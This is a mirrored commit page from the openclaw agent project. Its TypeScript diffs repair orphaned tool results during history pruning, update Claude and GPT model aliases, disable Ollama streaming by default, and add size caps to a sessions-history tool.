mirror of
https://github.com/openclaw/openclaw.git
synced 2026-05-08 07:01:24 +00:00
Merge branch 'main' into qianfan
This commit is contained in:
@@ -287,16 +287,18 @@ describe("exec notifyOnExit", () => {
|
||||
expect(result.details.status).toBe("running");
|
||||
const sessionId = (result.details as { sessionId: string }).sessionId;
|
||||
|
||||
const prefix = sessionId.slice(0, 8);
|
||||
let finished = getFinishedSession(sessionId);
|
||||
const deadline = Date.now() + (isWin ? 8000 : 2000);
|
||||
while (!finished && Date.now() < deadline) {
|
||||
let hasEvent = peekSystemEvents("agent:main:main").some((event) => event.includes(prefix));
|
||||
const deadline = Date.now() + (isWin ? 12_000 : 5_000);
|
||||
while ((!finished || !hasEvent) && Date.now() < deadline) {
|
||||
await sleep(20);
|
||||
finished = getFinishedSession(sessionId);
|
||||
hasEvent = peekSystemEvents("agent:main:main").some((event) => event.includes(prefix));
|
||||
}
|
||||
|
||||
expect(finished).toBeTruthy();
|
||||
const events = peekSystemEvents("agent:main:main");
|
||||
expect(events.some((event) => event.includes(sessionId.slice(0, 8)))).toBe(true);
|
||||
expect(hasEvent).toBe(true);
|
||||
});
|
||||
});
|
||||
|
||||
|
||||
@@ -9,8 +9,10 @@ export type ResolvedCliBackend = {
|
||||
|
||||
const CLAUDE_MODEL_ALIASES: Record<string, string> = {
|
||||
opus: "opus",
|
||||
"opus-4.6": "opus",
|
||||
"opus-4.5": "opus",
|
||||
"opus-4": "opus",
|
||||
"claude-opus-4-6": "opus",
|
||||
"claude-opus-4-5": "opus",
|
||||
"claude-opus-4": "opus",
|
||||
sonnet: "sonnet",
|
||||
|
||||
@@ -106,6 +106,10 @@ describe("pruneHistoryForContextShare", () => {
|
||||
});
|
||||
|
||||
it("returns droppedMessagesList containing dropped messages", () => {
|
||||
// Note: This test uses simple user messages with no tool calls.
|
||||
// When orphaned tool_results exist, droppedMessages may exceed
|
||||
// droppedMessagesList.length since orphans are counted but not
|
||||
// added to the list (they lack context for summarization).
|
||||
const messages: AgentMessage[] = [
|
||||
makeMessage(1, 4000),
|
||||
makeMessage(2, 4000),
|
||||
@@ -121,6 +125,7 @@ describe("pruneHistoryForContextShare", () => {
|
||||
});
|
||||
|
||||
expect(pruned.droppedChunks).toBeGreaterThan(0);
|
||||
// Without orphaned tool_results, counts match exactly
|
||||
expect(pruned.droppedMessagesList.length).toBe(pruned.droppedMessages);
|
||||
|
||||
// All messages accounted for: kept + dropped = original
|
||||
@@ -145,4 +150,144 @@ describe("pruneHistoryForContextShare", () => {
|
||||
expect(pruned.droppedMessagesList).toEqual([]);
|
||||
expect(pruned.messages.length).toBe(1);
|
||||
});
|
||||
|
||||
it("removes orphaned tool_result messages when tool_use is dropped", () => {
  // Scenario: the assistant message carrying the tool_use sits in chunk 1 (dropped),
  // while its tool_result sits in chunk 2 (kept). The now-orphaned tool_result must be
  // removed to prevent "unexpected tool_use_id" errors from Anthropic's API.
  const messages: AgentMessage[] = [
    // Chunk 1 (will be dropped) - contains tool_use
    {
      role: "assistant",
      content: [
        { type: "text", text: "x".repeat(4000) },
        { type: "toolUse", id: "call_123", name: "test_tool", input: {} },
      ],
      timestamp: 1,
    },
    // Chunk 2 (will be kept) - contains orphaned tool_result
    {
      role: "toolResult",
      toolCallId: "call_123",
      toolName: "test_tool",
      content: [{ type: "text", text: "result".repeat(500) }],
      timestamp: 2,
    } as AgentMessage,
    {
      role: "user",
      content: "x".repeat(500),
      timestamp: 3,
    },
  ];

  const pruned = pruneHistoryForContextShare({
    messages,
    maxContextTokens: 2000,
    maxHistoryShare: 0.5,
    parts: 2,
  });

  // The orphaned tool_result should NOT be in kept messages
  // (this is the critical invariant that prevents API errors).
  const keptRoles = pruned.messages.map((m) => m.role);
  expect(keptRoles).not.toContain("toolResult");

  // The orphan is counted in droppedMessages but is not added to droppedMessagesList
  // (it lacks the tool_use context needed for summarization), so the count exceeds the list.
  expect(pruned.droppedMessages).toBeGreaterThan(pruned.droppedMessagesList.length);
});
|
||||
|
||||
it("keeps tool_result when its tool_use is also kept", () => {
  // Scenario: both tool_use and tool_result are in the kept portion,
  // so the pairing is intact and nothing should be stripped.
  const messages: AgentMessage[] = [
    // Chunk 1 (will be dropped) - just user content
    {
      role: "user",
      content: "x".repeat(4000),
      timestamp: 1,
    },
    // Chunk 2 (will be kept) - contains both tool_use and tool_result
    {
      role: "assistant",
      content: [
        { type: "text", text: "y".repeat(500) },
        { type: "toolUse", id: "call_456", name: "kept_tool", input: {} },
      ],
      timestamp: 2,
    },
    {
      role: "toolResult",
      toolCallId: "call_456",
      toolName: "kept_tool",
      content: [{ type: "text", text: "result" }],
      timestamp: 3,
    } as AgentMessage,
  ];

  const pruned = pruneHistoryForContextShare({
    messages,
    maxContextTokens: 2000,
    maxHistoryShare: 0.5,
    parts: 2,
  });

  // Both assistant and toolResult should be in kept messages
  const keptRoles = pruned.messages.map((m) => m.role);
  expect(keptRoles).toContain("assistant");
  expect(keptRoles).toContain("toolResult");
});
|
||||
|
||||
it("removes multiple orphaned tool_results from the same dropped tool_use", () => {
  // Scenario: an assistant message with multiple tool_use blocks is dropped;
  // every corresponding tool_result must be removed from the kept messages.
  const messages: AgentMessage[] = [
    // Chunk 1 (will be dropped) - contains multiple tool_use blocks
    {
      role: "assistant",
      content: [
        { type: "text", text: "x".repeat(4000) },
        { type: "toolUse", id: "call_a", name: "tool_a", input: {} },
        { type: "toolUse", id: "call_b", name: "tool_b", input: {} },
      ],
      timestamp: 1,
    },
    // Chunk 2 (will be kept) - contains orphaned tool_results
    {
      role: "toolResult",
      toolCallId: "call_a",
      toolName: "tool_a",
      content: [{ type: "text", text: "result_a" }],
      timestamp: 2,
    } as AgentMessage,
    {
      role: "toolResult",
      toolCallId: "call_b",
      toolName: "tool_b",
      content: [{ type: "text", text: "result_b" }],
      timestamp: 3,
    } as AgentMessage,
    {
      role: "user",
      content: "x".repeat(500),
      timestamp: 4,
    },
  ];

  const pruned = pruneHistoryForContextShare({
    messages,
    maxContextTokens: 2000,
    maxHistoryShare: 0.5,
    parts: 2,
  });

  // No orphaned tool_results should be in kept messages
  const keptToolResults = pruned.messages.filter((m) => m.role === "toolResult");
  expect(keptToolResults).toHaveLength(0);

  // The orphan count should reflect both dropped tool_results:
  // droppedMessages = 1 (assistant) + 2 (orphaned tool_results) = 3,
  // while droppedMessagesList only has the assistant message.
  expect(pruned.droppedMessages).toBe(pruned.droppedMessagesList.length + 2);
});
|
||||
});
|
||||
|
||||
@@ -2,6 +2,7 @@ import type { AgentMessage } from "@mariozechner/pi-agent-core";
|
||||
import type { ExtensionContext } from "@mariozechner/pi-coding-agent";
|
||||
import { estimateTokens, generateSummary } from "@mariozechner/pi-coding-agent";
|
||||
import { DEFAULT_CONTEXT_TOKENS } from "./defaults.js";
|
||||
import { repairToolUseResultPairing } from "./session-transcript-repair.js";
|
||||
|
||||
export const BASE_CHUNK_RATIO = 0.4;
|
||||
export const MIN_CHUNK_RATIO = 0.15;
|
||||
@@ -333,11 +334,27 @@ export function pruneHistoryForContextShare(params: {
|
||||
break;
|
||||
}
|
||||
const [dropped, ...rest] = chunks;
|
||||
const flatRest = rest.flat();
|
||||
|
||||
// After dropping a chunk, repair tool_use/tool_result pairing to handle
|
||||
// orphaned tool_results (whose tool_use was in the dropped chunk).
|
||||
// repairToolUseResultPairing drops orphaned tool_results, preventing
|
||||
// "unexpected tool_use_id" errors from Anthropic's API.
|
||||
const repairReport = repairToolUseResultPairing(flatRest);
|
||||
const repairedKept = repairReport.messages;
|
||||
|
||||
// Track orphaned tool_results as dropped (they were in kept but their tool_use was dropped)
|
||||
const orphanedCount = repairReport.droppedOrphanCount;
|
||||
|
||||
droppedChunks += 1;
|
||||
droppedMessages += dropped.length;
|
||||
droppedMessages += dropped.length + orphanedCount;
|
||||
droppedTokens += estimateMessagesTokens(dropped);
|
||||
// Note: We don't have the actual orphaned messages to add to droppedMessagesList
|
||||
// since repairToolUseResultPairing doesn't return them. This is acceptable since
|
||||
// the dropped messages are used for summarization, and orphaned tool_results
|
||||
// without their tool_use context aren't useful for summarization anyway.
|
||||
allDroppedMessages.push(...dropped);
|
||||
keptMessages = rest.flat();
|
||||
keptMessages = repairedKept;
|
||||
}
|
||||
|
||||
return {
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
// Defaults for agent metadata when upstream does not supply them.
// Model id uses pi-ai's built-in Anthropic catalog.
export const DEFAULT_PROVIDER = "anthropic";
export const DEFAULT_MODEL = "claude-opus-4-6";
// Conservative fallback used when model metadata is unavailable.
export const DEFAULT_CONTEXT_TOKENS = 200_000;
|
||||
|
||||
@@ -3,11 +3,17 @@ export type ModelRef = {
|
||||
id?: string | null;
|
||||
};
|
||||
|
||||
// Anthropic model-id prefixes, one entry per supported model family.
const ANTHROPIC_PREFIXES = [
  "claude-opus-4-6",
  "claude-opus-4-5",
  "claude-sonnet-4-5",
  "claude-haiku-4-5",
];
|
||||
const OPENAI_MODELS = ["gpt-5.2", "gpt-5.0"];
|
||||
const CODEX_MODELS = [
|
||||
"gpt-5.2",
|
||||
"gpt-5.2-codex",
|
||||
"gpt-5.3-codex",
|
||||
"gpt-5.1-codex",
|
||||
"gpt-5.1-codex-mini",
|
||||
"gpt-5.1-codex-max",
|
||||
|
||||
@@ -140,7 +140,7 @@ describe("getApiKeyForModel", () => {
|
||||
} catch (err) {
|
||||
error = err;
|
||||
}
|
||||
expect(String(error)).toContain("openai-codex/gpt-5.2");
|
||||
expect(String(error)).toContain("openai-codex/gpt-5.3-codex");
|
||||
} finally {
|
||||
if (previousOpenAiKey === undefined) {
|
||||
delete process.env.OPENAI_API_KEY;
|
||||
|
||||
@@ -213,7 +213,7 @@ export async function resolveApiKeyForProvider(params: {
|
||||
const hasCodex = listProfilesForProvider(store, "openai-codex").length > 0;
|
||||
if (hasCodex) {
|
||||
throw new Error(
|
||||
'No API key found for provider "openai". You are authenticated with OpenAI Codex OAuth. Use openai-codex/gpt-5.2 (ChatGPT OAuth) or set OPENAI_API_KEY for openai/gpt-5.2.',
|
||||
'No API key found for provider "openai". You are authenticated with OpenAI Codex OAuth. Use openai-codex/gpt-5.3-codex (OAuth) or set OPENAI_API_KEY to use openai/gpt-5.1-codex.',
|
||||
);
|
||||
}
|
||||
}
|
||||
@@ -302,6 +302,7 @@ export function resolveEnvApiKey(provider: string): EnvApiKeyResult | null {
|
||||
mistral: "MISTRAL_API_KEY",
|
||||
opencode: "OPENCODE_API_KEY",
|
||||
qianfan: "QIANFAN_API_KEY",
|
||||
ollama: "OLLAMA_API_KEY",
|
||||
};
|
||||
const envVar = envMap[normalized];
|
||||
if (!envVar) {
|
||||
|
||||
@@ -13,9 +13,9 @@ import {
|
||||
isTimeoutError,
|
||||
} from "./failover-error.js";
|
||||
import {
|
||||
buildConfiguredAllowlistKeys,
|
||||
buildModelAliasIndex,
|
||||
modelKey,
|
||||
parseModelRef,
|
||||
resolveConfiguredModelRef,
|
||||
resolveModelRefFromString,
|
||||
} from "./model-selection.js";
|
||||
@@ -51,28 +51,6 @@ function shouldRethrowAbort(err: unknown): boolean {
|
||||
return isAbortError(err) && !isTimeoutError(err);
|
||||
}
|
||||
|
||||
/**
 * Builds the set of allowed model keys from the configured model map.
 *
 * @param cfg - Config whose `agents.defaults.models` keys form the raw allowlist.
 * @param defaultProvider - Provider passed to `parseModelRef` for each entry.
 * @returns The set of `modelKey(provider, model)` values, or `null` when no models are
 *   configured or none of the entries parse.
 */
function buildAllowedModelKeys(
  cfg: OpenClawConfig | undefined,
  defaultProvider: string,
): Set<string> | null {
  // Object.keys always yields strings, so no per-entry coercion is needed.
  const rawAllowlist = Object.keys(cfg?.agents?.defaults?.models ?? {});
  if (rawAllowlist.length === 0) {
    return null;
  }
  const keys = new Set<string>();
  for (const raw of rawAllowlist) {
    const parsed = parseModelRef(raw, defaultProvider);
    if (!parsed) {
      // Skip entries that parseModelRef rejects.
      continue;
    }
    keys.add(modelKey(parsed.provider, parsed.model));
  }
  return keys.size > 0 ? keys : null;
}
|
||||
|
||||
function resolveImageFallbackCandidates(params: {
|
||||
cfg: OpenClawConfig | undefined;
|
||||
defaultProvider: string;
|
||||
@@ -82,7 +60,10 @@ function resolveImageFallbackCandidates(params: {
|
||||
cfg: params.cfg ?? {},
|
||||
defaultProvider: params.defaultProvider,
|
||||
});
|
||||
const allowlist = buildAllowedModelKeys(params.cfg, params.defaultProvider);
|
||||
const allowlist = buildConfiguredAllowlistKeys({
|
||||
cfg: params.cfg,
|
||||
defaultProvider: params.defaultProvider,
|
||||
});
|
||||
const seen = new Set<string>();
|
||||
const candidates: ModelCandidate[] = [];
|
||||
|
||||
@@ -166,7 +147,10 @@ function resolveFallbackCandidates(params: {
|
||||
cfg: params.cfg ?? {},
|
||||
defaultProvider,
|
||||
});
|
||||
const allowlist = buildAllowedModelKeys(params.cfg, defaultProvider);
|
||||
const allowlist = buildConfiguredAllowlistKeys({
|
||||
cfg: params.cfg,
|
||||
defaultProvider,
|
||||
});
|
||||
const seen = new Set<string>();
|
||||
const candidates: ModelCandidate[] = [];
|
||||
|
||||
|
||||
@@ -29,6 +29,17 @@ describe("model-selection", () => {
|
||||
});
|
||||
});
|
||||
|
||||
it("normalizes anthropic alias refs to canonical model ids", () => {
  // Explicit provider prefix: the alias after the slash is canonicalized.
  expect(parseModelRef("anthropic/opus-4.6", "openai")).toEqual({
    provider: "anthropic",
    model: "claude-opus-4-6",
  });
  // No provider prefix: the default provider is used and the alias is still canonicalized.
  expect(parseModelRef("opus-4.6", "anthropic")).toEqual({
    provider: "anthropic",
    model: "claude-opus-4-6",
  });
});
|
||||
|
||||
it("should use default provider if none specified", () => {
|
||||
expect(parseModelRef("claude-3-5-sonnet", "anthropic")).toEqual({
|
||||
provider: "anthropic",
|
||||
|
||||
@@ -16,6 +16,12 @@ export type ModelAliasIndex = {
|
||||
byKey: Map<string, string[]>;
|
||||
};
|
||||
|
||||
// Short Anthropic aliases (lower-case) mapped to their canonical model ids.
const ANTHROPIC_MODEL_ALIASES: Record<string, string> = {
  "opus-4.6": "claude-opus-4-6",
  "opus-4.5": "claude-opus-4-5",
  "sonnet-4.5": "claude-sonnet-4-5",
};
|
||||
|
||||
/**
 * Canonicalizes an alias so it can be used as a lookup key.
 *
 * @param value - Raw alias text.
 * @returns The alias with surrounding whitespace removed and letters lower-cased.
 */
function normalizeAliasKey(value: string): string {
  return value.trim().toLowerCase();
}
|
||||
@@ -59,13 +65,7 @@ function normalizeAnthropicModelId(model: string): string {
|
||||
return trimmed;
|
||||
}
|
||||
const lower = trimmed.toLowerCase();
|
||||
if (lower === "opus-4.5") {
|
||||
return "claude-opus-4-5";
|
||||
}
|
||||
if (lower === "sonnet-4.5") {
|
||||
return "claude-sonnet-4-5";
|
||||
}
|
||||
return trimmed;
|
||||
return ANTHROPIC_MODEL_ALIASES[lower] ?? trimmed;
|
||||
}
|
||||
|
||||
function normalizeProviderModelId(provider: string, model: string): string {
|
||||
@@ -99,6 +99,33 @@ export function parseModelRef(raw: string, defaultProvider: string): ModelRef |
|
||||
return { provider, model: normalizedModel };
|
||||
}
|
||||
|
||||
/**
 * Resolves a raw allowlist entry to its model key.
 *
 * @param raw - Allowlist entry as written in config.
 * @param defaultProvider - Provider passed through to `parseModelRef`.
 * @returns `modelKey(provider, model)` for the parsed reference, or `null` when
 *   `parseModelRef` yields nothing.
 */
export function resolveAllowlistModelKey(raw: string, defaultProvider: string): string | null {
  const parsed = parseModelRef(raw, defaultProvider);
  if (!parsed) {
    return null;
  }
  return modelKey(parsed.provider, parsed.model);
}
|
||||
|
||||
/**
 * Builds the set of allowed model keys from `cfg.agents.defaults.models`.
 *
 * @param params.cfg - Config whose model-map keys form the raw allowlist.
 * @param params.defaultProvider - Provider passed to `resolveAllowlistModelKey` for each entry.
 * @returns The resolved keys, or `null` when no models are configured or no entry resolves.
 */
export function buildConfiguredAllowlistKeys(params: {
  cfg: OpenClawConfig | undefined;
  defaultProvider: string;
}): Set<string> | null {
  // Object.keys always yields strings, so no per-entry coercion is needed.
  const rawAllowlist = Object.keys(params.cfg?.agents?.defaults?.models ?? {});
  if (rawAllowlist.length === 0) {
    return null;
  }

  const keys = new Set<string>();
  for (const raw of rawAllowlist) {
    const key = resolveAllowlistModelKey(raw, params.defaultProvider);
    if (key) {
      keys.add(key);
    }
  }
  return keys.size > 0 ? keys : null;
}
|
||||
|
||||
export function buildModelAliasIndex(params: {
|
||||
cfg: OpenClawConfig;
|
||||
defaultProvider: string;
|
||||
|
||||
@@ -12,4 +12,45 @@ describe("Ollama provider", () => {
|
||||
// Ollama requires explicit configuration via OLLAMA_API_KEY env var or profile
|
||||
expect(providers?.ollama).toBeUndefined();
|
||||
});
|
||||
|
||||
it("should disable streaming by default for Ollama models", async () => {
  const agentDir = mkdtempSync(join(tmpdir(), "openclaw-test-"));
  // Remember any pre-existing key so the test restores the caller's environment
  // instead of unconditionally deleting the variable.
  const previousOllamaKey = process.env.OLLAMA_API_KEY;
  process.env.OLLAMA_API_KEY = "test-key";

  try {
    const providers = await resolveImplicitProviders({ agentDir });

    // Provider should be defined with OLLAMA_API_KEY set
    expect(providers?.ollama).toBeDefined();
    expect(providers?.ollama?.apiKey).toBe("OLLAMA_API_KEY");

    // Note: discoverOllamaModels() returns empty array in test environments (VITEST env var check)
    // so we can't test the actual model discovery here. The streaming: false setting
    // is applied in the model mapping within discoverOllamaModels().
    // The configuration structure itself is validated by TypeScript and the Zod schema.
  } finally {
    if (previousOllamaKey === undefined) {
      delete process.env.OLLAMA_API_KEY;
    } else {
      process.env.OLLAMA_API_KEY = previousOllamaKey;
    }
  }
});
|
||||
|
||||
it("should have correct model structure with streaming disabled (unit test)", () => {
  // This test directly verifies the model configuration structure
  // since discoverOllamaModels() returns empty array in test mode.
  // NOTE(review): the assertions below only inspect this local literal; they do not
  // exercise discoverOllamaModels() and cannot detect a regression there.
  const mockOllamaModel = {
    id: "llama3.3:latest",
    name: "llama3.3:latest",
    reasoning: false,
    input: ["text"],
    cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
    contextWindow: 128000,
    maxTokens: 8192,
    params: {
      streaming: false,
    },
  };

  // Verify the model structure matches what discoverOllamaModels() would return
  expect(mockOllamaModel.params.streaming).toBe(false);
  expect(mockOllamaModel.params).toHaveProperty("streaming");
});
|
||||
});
|
||||
|
||||
@@ -136,6 +136,11 @@ async function discoverOllamaModels(): Promise<ModelDefinitionConfig[]> {
|
||||
cost: OLLAMA_DEFAULT_COST,
|
||||
contextWindow: OLLAMA_DEFAULT_CONTEXT_WINDOW,
|
||||
maxTokens: OLLAMA_DEFAULT_MAX_TOKENS,
|
||||
// Disable streaming by default for Ollama to avoid SDK issue #1205
|
||||
// See: https://github.com/badlogic/pi-mono/issues/1205
|
||||
params: {
|
||||
streaming: false,
|
||||
},
|
||||
};
|
||||
});
|
||||
} catch (error) {
|
||||
|
||||
@@ -181,6 +181,128 @@ describe("sessions tools", () => {
|
||||
expect(withToolsDetails.messages).toHaveLength(2);
|
||||
});
|
||||
|
||||
it("sessions_history caps oversized payloads and strips heavy fields", async () => {
  callGatewayMock.mockReset();
  // 80 messages, each carrying large text, thinking, signature, and details payloads.
  const oversized = Array.from({ length: 80 }, (_, idx) => ({
    role: "assistant",
    content: [
      {
        type: "text",
        text: `${String(idx)}:${"x".repeat(5000)}`,
      },
      {
        type: "thinking",
        thinking: "y".repeat(7000),
        thinkingSignature: "sig".repeat(4000),
      },
    ],
    details: {
      giant: "z".repeat(12000),
    },
    usage: {
      input: 1,
      output: 1,
    },
  }));
  callGatewayMock.mockImplementation(async (opts: unknown) => {
    const request = opts as { method?: string };
    if (request.method === "chat.history") {
      return { messages: oversized };
    }
    return {};
  });

  const tool = createOpenClawTools().find((candidate) => candidate.name === "sessions_history");
  expect(tool).toBeDefined();
  if (!tool) {
    throw new Error("missing sessions_history tool");
  }

  const result = await tool.execute("call4b", {
    sessionKey: "main",
    includeTools: true,
  });
  const details = result.details as {
    messages?: Array<Record<string, unknown>>;
    truncated?: boolean;
    droppedMessages?: boolean;
    contentTruncated?: boolean;
    bytes?: number;
  };
  expect(details.truncated).toBe(true);
  expect(details.droppedMessages).toBe(true);
  expect(details.contentTruncated).toBe(true);
  expect(typeof details.bytes).toBe("number");
  // Comparison matchers report the actual value on failure, unlike `expect(a <= b).toBe(true)`.
  expect(details.bytes ?? 0).toBeLessThanOrEqual(80 * 1024);
  expect(details.messages?.length ?? 0).toBeGreaterThan(0);

  const first = details.messages?.[0] as
    | {
        details?: unknown;
        usage?: unknown;
        content?: Array<{
          type?: string;
          text?: string;
          thinking?: string;
          thinkingSignature?: string;
        }>;
      }
    | undefined;
  // Heavy per-message fields must be stripped from the returned history.
  expect(first?.details).toBeUndefined();
  expect(first?.usage).toBeUndefined();
  const textBlock = first?.content?.find((block) => block.type === "text");
  expect(typeof textBlock?.text).toBe("string");
  expect((textBlock?.text ?? "").length).toBeLessThanOrEqual(4015);
  const thinkingBlock = first?.content?.find((block) => block.type === "thinking");
  expect(thinkingBlock?.thinkingSignature).toBeUndefined();
});
|
||||
|
||||
it("sessions_history enforces a hard byte cap even when a single message is huge", async () => {
  callGatewayMock.mockReset();
  callGatewayMock.mockImplementation(async (opts: unknown) => {
    const request = opts as { method?: string };
    if (request.method === "chat.history") {
      return {
        messages: [
          {
            role: "assistant",
            content: [{ type: "text", text: "ok" }],
            // Oversized field outside `content`, so the message itself is what is too large.
            extra: "x".repeat(200_000),
          },
        ],
      };
    }
    return {};
  });

  const tool = createOpenClawTools().find((candidate) => candidate.name === "sessions_history");
  expect(tool).toBeDefined();
  if (!tool) {
    throw new Error("missing sessions_history tool");
  }

  const result = await tool.execute("call4c", {
    sessionKey: "main",
    includeTools: true,
  });
  const details = result.details as {
    messages?: Array<Record<string, unknown>>;
    truncated?: boolean;
    droppedMessages?: boolean;
    contentTruncated?: boolean;
    bytes?: number;
  };
  expect(details.truncated).toBe(true);
  expect(details.droppedMessages).toBe(true);
  expect(details.contentTruncated).toBe(false);
  expect(typeof details.bytes).toBe("number");
  // Comparison matcher reports the actual byte count on failure.
  expect(details.bytes ?? 0).toBeLessThanOrEqual(80 * 1024);
  expect(details.messages).toHaveLength(1);
  expect(details.messages?.[0]?.content).toContain(
    "[sessions_history omitted: message too large]",
  );
});
|
||||
|
||||
it("sessions_history resolves sessionId inputs", async () => {
|
||||
callGatewayMock.mockReset();
|
||||
const sessionId = "sess-group";
|
||||
|
||||
@@ -8,12 +8,12 @@ import {
|
||||
|
||||
describe("resolveOpencodeZenAlias", () => {
|
||||
it("resolves opus alias", () => {
|
||||
expect(resolveOpencodeZenAlias("opus")).toBe("claude-opus-4-5");
|
||||
expect(resolveOpencodeZenAlias("opus")).toBe("claude-opus-4-6");
|
||||
});
|
||||
|
||||
it("keeps legacy aliases working", () => {
|
||||
expect(resolveOpencodeZenAlias("sonnet")).toBe("claude-opus-4-5");
|
||||
expect(resolveOpencodeZenAlias("haiku")).toBe("claude-opus-4-5");
|
||||
expect(resolveOpencodeZenAlias("sonnet")).toBe("claude-opus-4-6");
|
||||
expect(resolveOpencodeZenAlias("haiku")).toBe("claude-opus-4-6");
|
||||
expect(resolveOpencodeZenAlias("gpt4")).toBe("gpt-5.1");
|
||||
expect(resolveOpencodeZenAlias("o1")).toBe("gpt-5.2");
|
||||
expect(resolveOpencodeZenAlias("gemini-2.5")).toBe("gemini-3-pro");
|
||||
@@ -32,14 +32,14 @@ describe("resolveOpencodeZenAlias", () => {
|
||||
});
|
||||
|
||||
it("is case-insensitive", () => {
|
||||
expect(resolveOpencodeZenAlias("OPUS")).toBe("claude-opus-4-5");
|
||||
expect(resolveOpencodeZenAlias("OPUS")).toBe("claude-opus-4-6");
|
||||
expect(resolveOpencodeZenAlias("Gpt5")).toBe("gpt-5.2");
|
||||
});
|
||||
});
|
||||
|
||||
describe("resolveOpencodeZenModelApi", () => {
|
||||
it("maps APIs by model family", () => {
|
||||
expect(resolveOpencodeZenModelApi("claude-opus-4-5")).toBe("anthropic-messages");
|
||||
expect(resolveOpencodeZenModelApi("claude-opus-4-6")).toBe("anthropic-messages");
|
||||
expect(resolveOpencodeZenModelApi("gemini-3-pro")).toBe("google-generative-ai");
|
||||
expect(resolveOpencodeZenModelApi("gpt-5.2")).toBe("openai-responses");
|
||||
expect(resolveOpencodeZenModelApi("alpha-gd4")).toBe("openai-completions");
|
||||
@@ -53,13 +53,14 @@ describe("getOpencodeZenStaticFallbackModels", () => {
|
||||
it("returns an array of models", () => {
|
||||
const models = getOpencodeZenStaticFallbackModels();
|
||||
expect(Array.isArray(models)).toBe(true);
|
||||
expect(models.length).toBe(9);
|
||||
expect(models.length).toBe(10);
|
||||
});
|
||||
|
||||
it("includes Claude, GPT, Gemini, and GLM models", () => {
|
||||
const models = getOpencodeZenStaticFallbackModels();
|
||||
const ids = models.map((m) => m.id);
|
||||
|
||||
expect(ids).toContain("claude-opus-4-6");
|
||||
expect(ids).toContain("claude-opus-4-5");
|
||||
expect(ids).toContain("gpt-5.2");
|
||||
expect(ids).toContain("gpt-5.1-codex");
|
||||
@@ -83,15 +84,16 @@ describe("getOpencodeZenStaticFallbackModels", () => {
|
||||
|
||||
describe("OPENCODE_ZEN_MODEL_ALIASES", () => {
|
||||
it("has expected aliases", () => {
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.opus).toBe("claude-opus-4-5");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.opus).toBe("claude-opus-4-6");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.codex).toBe("gpt-5.1-codex");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.gpt5).toBe("gpt-5.2");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.gemini).toBe("gemini-3-pro");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.glm).toBe("glm-4.7");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES["opus-4.5"]).toBe("claude-opus-4-5");
|
||||
|
||||
// Legacy aliases (kept for backward compatibility).
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.sonnet).toBe("claude-opus-4-5");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.haiku).toBe("claude-opus-4-5");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.sonnet).toBe("claude-opus-4-6");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.haiku).toBe("claude-opus-4-6");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.gpt4).toBe("gpt-5.1");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES.o1).toBe("gpt-5.2");
|
||||
expect(OPENCODE_ZEN_MODEL_ALIASES["gemini-2.5"]).toBe("gemini-3-pro");
|
||||
|
||||
@@ -1,8 +1,11 @@
|
||||
/**
|
||||
* OpenCode Zen model catalog with dynamic fetching, caching, and static fallback.
|
||||
*
|
||||
* OpenCode Zen is a $200/month subscription that provides proxy access to multiple
|
||||
* AI models (Claude, GPT, Gemini, etc.) through a single API endpoint.
|
||||
* OpenCode Zen is a pay-as-you-go token-based API that provides access to curated
|
||||
* models optimized for coding agents. It uses per-request billing with auto top-up.
|
||||
*
|
||||
* Note: OpenCode Black ($20/$100/$200/month subscriptions) is a separate product
|
||||
* with flat-rate usage tiers. This module handles Zen, not Black.
|
||||
*
|
||||
* API endpoint: https://opencode.ai/zen/v1
|
||||
* Auth URL: https://opencode.ai/auth
|
||||
@@ -11,7 +14,7 @@
|
||||
import type { ModelApi, ModelDefinitionConfig } from "../config/types.js";
|
||||
|
||||
// Base URL of the OpenCode Zen API.
export const OPENCODE_ZEN_API_BASE_URL = "https://opencode.ai/zen/v1";
// Default model id, and the same id qualified with the "opencode/" provider prefix.
export const OPENCODE_ZEN_DEFAULT_MODEL = "claude-opus-4-6";
export const OPENCODE_ZEN_DEFAULT_MODEL_REF = `opencode/${OPENCODE_ZEN_DEFAULT_MODEL}`;
|
||||
|
||||
// Cache for fetched models (1 hour TTL)
|
||||
@@ -21,19 +24,20 @@ const CACHE_TTL_MS = 60 * 60 * 1000; // 1 hour
|
||||
|
||||
/**
|
||||
* Model aliases for convenient shortcuts.
|
||||
* Users can use "opus" instead of "claude-opus-4-5", etc.
|
||||
* Users can use "opus" instead of "claude-opus-4-6", etc.
|
||||
*/
|
||||
export const OPENCODE_ZEN_MODEL_ALIASES: Record<string, string> = {
|
||||
// Claude
|
||||
opus: "claude-opus-4-5",
|
||||
opus: "claude-opus-4-6",
|
||||
"opus-4.6": "claude-opus-4-6",
|
||||
"opus-4.5": "claude-opus-4-5",
|
||||
"opus-4": "claude-opus-4-5",
|
||||
"opus-4": "claude-opus-4-6",
|
||||
|
||||
// Legacy Claude aliases (OpenCode Zen rotates model catalogs; keep old keys working).
|
||||
sonnet: "claude-opus-4-5",
|
||||
"sonnet-4": "claude-opus-4-5",
|
||||
haiku: "claude-opus-4-5",
|
||||
"haiku-3.5": "claude-opus-4-5",
|
||||
sonnet: "claude-opus-4-6",
|
||||
"sonnet-4": "claude-opus-4-6",
|
||||
haiku: "claude-opus-4-6",
|
||||
"haiku-3.5": "claude-opus-4-6",
|
||||
|
||||
// GPT-5.x family
|
||||
gpt5: "gpt-5.2",
|
||||
@@ -119,6 +123,7 @@ const MODEL_COSTS: Record<
|
||||
cacheRead: 0.107,
|
||||
cacheWrite: 0,
|
||||
},
|
||||
"claude-opus-4-6": { input: 5, output: 25, cacheRead: 0.5, cacheWrite: 6.25 },
|
||||
"claude-opus-4-5": { input: 5, output: 25, cacheRead: 0.5, cacheWrite: 6.25 },
|
||||
"gemini-3-pro": { input: 2, output: 12, cacheRead: 0.2, cacheWrite: 0 },
|
